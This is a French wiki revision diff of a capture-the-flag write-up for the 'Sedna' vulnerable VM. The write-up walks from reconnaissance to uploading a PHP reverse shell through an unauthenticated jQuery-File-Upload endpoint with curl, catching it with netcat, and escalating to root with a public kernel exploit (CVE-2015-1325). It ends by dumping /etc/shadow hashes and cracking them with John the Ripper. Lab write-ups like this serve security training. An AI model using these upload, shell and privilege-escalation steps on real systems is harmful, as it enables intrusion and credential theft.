Outils pour utilisateurs

Outils du site


vm:sedna

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

vm:sedna [2017/03/22 09:54]
arkinar créée
vm:sedna [2017/03/22 12:42] (Version actuelle)
arkinar
Ligne 1: Ligne 1:
 **Sedna - Write Up** **Sedna - Write Up**
  
 +__Reconnaissance__
  
 <code BASH> <code BASH>
Ligne 21: Ligne 22:
 Après quelques essais on remarque : Après quelques essais on remarque :
  
-- Tomcat n'​utilise pas d'​identifiants simple à deviner +  ​ Tomcat n'​utilise pas d'​identifiants simple à deviner 
-- Il n'y a pas d'​exploit pour rpcbind et bind 9+   Il n'y a pas d'​exploit pour rpcbind et bind 9
  
 +__Exploitation Web__
  
 Pour le port 80 : Pour le port 80 :
Ligne 70: Ligne 72:
 Dirb nous ressort tout un tas de dossier à aller visiter. Dirb nous ressort tout un tas de dossier à aller visiter.
  
-Dans le dossier "​themes"​ on trouve un dashboard ​et en regardant le code source du dashboard on voit :+Dans le dossier "​themes"​ on trouve un dashboard
 + 
 +En regardant le code source du dashboard on voit :
  
 <file HTML dashboard_index.html>​ <file HTML dashboard_index.html>​
Ligne 107: Ligne 111:
 L'url vulnérable est la suivante : L'url vulnérable est la suivante :
 <​code>​ <​code>​
-http://​192.168.43.168/​themes/​dashboard/​assets/​plugins/​jquery-file-upload/​server/​php/​+http://​192.168.43.43/​themes/​dashboard/​assets/​plugins/​jquery-file-upload/​server/​php/​
 </​code>​ </​code>​
  
Ligne 119: Ligne 123:
  
 <code BASH> <code BASH>
-curl -i -X POST -H "​Content-Type:​ multipart/​form-data"​ -F "​files=@php-reverse-shell.php"​ http://​192.168.43.168/​themes/​dashboard/​assets/​plugins/​jquery-file-upload/​server/​php/​+curl -i -X POST -H "​Content-Type:​ multipart/​form-data"​ -F "​files=@php-reverse-shell.php"​ http://​192.168.43.43/​themes/​dashboard/​assets/​plugins/​jquery-file-upload/​server/​php/​
 </​code>​ </​code>​
  
-Mon fichier une fois uploader ​est situé : +Mon fichier une fois uploadé ​est situé : 
 <​code>​ <​code>​
 http://​192.168.43.168/​files/​php-reverse-shell.php http://​192.168.43.168/​files/​php-reverse-shell.php
Ligne 134: Ligne 138:
  
 {{ :​vm:​nc.png?​nolink |}} {{ :​vm:​nc.png?​nolink |}}
 +
 +__Exploitation du système & Élévation de privilèges__
  
 On va chercher la version du kernel : On va chercher la version du kernel :
Ligne 170: Ligne 176:
 [[https://​raw.githubusercontent.com/​offensive-security/​exploit-database/​master/​platforms/​linux/​local/​37088.c]] [[https://​raw.githubusercontent.com/​offensive-security/​exploit-database/​master/​platforms/​linux/​local/​37088.c]]
  
-il est basé sur la CVE-2015-1325 et à été testé sur la version 14.04 d'​Ubuntu.+Il est basé sur la CVE-2015-1325 et à été testé sur la version 14.04 d'​Ubuntu.
  
-on récupère l'​exploit sur la machine (j'ai choisi le de dossier /​var/​www/​html car accessible en écriture).+On récupère l'​exploit sur la machine (j'ai choisi le dossier /​var/​www/​html car il est accessible en écriture).
  
 <code BASH> <code BASH>
Ligne 219: Ligne 225:
 a10828bee17db751de4b936614558305 a10828bee17db751de4b936614558305
 </​code>​ </​code>​
 +
 +__Pour aller plus loin__
  
 On va chercher les identifiants du tomcat : On va chercher les identifiants du tomcat :
Ligne 232: Ligne 240:
  
 On récupère les /etc/shadow et /etc/passwd On récupère les /etc/shadow et /etc/passwd
 +
 +<file shadow>
 +root:​$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:​17097:​0:​99999:​7:::​
 +crackmeforpoints:​$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/​1upG.54kSph/​HSP1LFcn4.2C11cF0R7QmojBqNy5/:​17104:​0:​99999:​7:::​
 +</​file>​
 +
 +<file passwd>
 +root:​x:​0:​0:​root:/​root:/​bin/​bash
 +crackmeforpoints:​x:​1000:​1000::/​home/​crackmeforpoints:​
 +</​file>​
 +
 +Utilisation de l'​outil unshadow de la suite John The Ripper :
 +
 +<code BASH>
 +./unshadow passwd shadow > hash_a_crack
 +</​code>​
 +
 +Tentative de casser les hash avec john :
 +<code BASH>
 +./john hash_a_crack
 +</​code>​
 +
 +Les mots de passes n'ont pas été trouvés dans un délais 20 minutes de crack.
 +
 +L'​exploitation de la machine c'est finit à ce niveau là.
 +
 +Merci à l'​auteur de la machine.
vm/sedna.txt · Dernière modification: 2017/03/22 12:42 par arkinar